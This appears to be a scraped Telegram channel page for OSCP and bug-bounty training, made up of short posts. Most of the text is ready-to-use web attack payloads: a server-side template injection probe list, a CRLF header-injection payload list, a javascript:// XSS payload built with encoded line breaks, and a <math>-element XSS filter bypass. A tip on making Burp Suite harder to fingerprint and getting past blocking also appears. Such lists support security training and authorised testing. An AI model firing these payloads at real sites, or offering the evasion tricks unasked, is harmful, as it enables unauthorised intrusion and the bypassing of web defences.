πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
8.1K subscribers
162 photos
1 video
27 files
64 links
Offensive Security Certified Professional
@WebHacking
@pfsense
@WifiHacking
πŸ”°For safer days
Download Telegram
https://portswigger.net/burp/documentation/desktop/settings/network/tls#tls-negotiation


Burp Suite 2023.10 is harder to fingerprint than earlier versions as it now sets 'Accept-Encoding: gzip, deflate, br'. If you're still blocked, you might bypass it by tinkering with your TLS ciphers using "Network->TLS -> Use custom protocols and ciphers"
πŸ‘3
Bug Bounty Tip

SSTI (Server Side Template Injection) Payload List

πŸ”Ή{7*7}
πŸ”Ή*{7*7}
πŸ”Ή{{7*7}}
πŸ”Ή[[7*7]]
πŸ”Ή${7*7}
πŸ”Ή@(7*7)
πŸ”Ή<?=7*7?>
πŸ”Ή<%= 7*7 %>
πŸ”Ή${= 7*7}
πŸ”Ή{{= 7*7}}
πŸ”Ή${{7*7}}
πŸ”Ή#{7*7}
πŸ”Ή[=7*7]

If evaluated as 49 - the target is vulnerable
πŸ‘11
Bug Bounty Tip

When the app only accepts URLs
with a specific scheme, try
injecting javascript://test.com

Then, use these symbols
to craft an XSS payload
πŸ”Ή%0a
πŸ”Ή%0d
πŸ”Ή%E2%80%A8
πŸ”Ή%E2%80%A9

βœ… javascript://test.com%0aalert(1)
πŸ‘13❀1
CRLF Payload List

πŸ”Ή /%%0a0aSet-Cookie:crlf
πŸ”Ή /%0aSet-Cookie:crlf
πŸ”Ή /%0d%0aSet-Cookie:crlf
πŸ”Ή /%0dSet-Cookie:crlf
πŸ”Ή /%23%0aSet-Cookie:crlf
πŸ”Ή /%23%0d%0aSet-Cookie:crlf
πŸ”Ή /%23%0dSet-Cookie:crlf
πŸ”Ή /%25%30%61Set-Cookie:crlf
πŸ”Ή /%25%30aSet-Cookie:crlf
πŸ”Ή /%250aSet-Cookie:crlf
πŸ”Ή /%25250aSet-Cookie:crlf
πŸ”Ή /%2e%2e%2f%0d%0aSet-Cookie:crlf
πŸ”Ή /%2f%2e%2e%0d%0aSet-Cookie:crlf
πŸ”Ή /%2F..%0d%0aSet-Cookie:crlf
πŸ”Ή /%3f%0d%0aSet-Cookie:crlf
πŸ”Ή /%3f%0dSet-Cookie:crlf
πŸ”Ή /%u000aSet-Cookie:crlf
πŸ”Ή /%E5%98%8D%E5%98%8ASet-Cookie:crlf
πŸ‘12❀1
Bug Bounty Reminder

Don't forget about the <math> element for XSS WAF bypass on Firefox browser.

<math>
<xss href="javascript:alert(31337)">
Click Me
</xss>
</math>

The <math> can make any HTML element clickable within it.
πŸ‘23❀5πŸ”₯2